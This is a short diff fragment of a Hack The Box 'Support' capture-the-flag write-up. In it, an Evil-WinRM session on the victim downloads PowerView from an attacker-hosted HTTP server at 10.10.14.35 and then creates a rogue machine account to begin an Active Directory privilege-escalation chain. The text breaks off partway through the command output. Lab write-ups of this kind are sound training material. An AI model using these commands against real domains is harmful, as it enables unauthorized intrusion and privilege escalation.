Rogue-1/HTB/FullPWN/Support.md

 *Evil-WinRM* PS C:\temp> curl http://10.10.14.35:8000/powerview.ps1 -o powerview.ps1
 *Evil-WinRM* PS C:\temp> import-module ./powerview.ps1
 ```
+From this point on is where I was stuck and received help.

+After importing both modules on the victim we can run these commands.

+First we create a new machine account with a password.
+Then we need to grab our new sid.

 ```*Evil-WinRM* PS C:\temp> New-MachineAccount -MachineAccount rogue -Password $(ConvertTo-SecureString 'pass' -AsPlainText -Force) -Verbose
 Verbose: [+] Domain Controller = dc.support.htb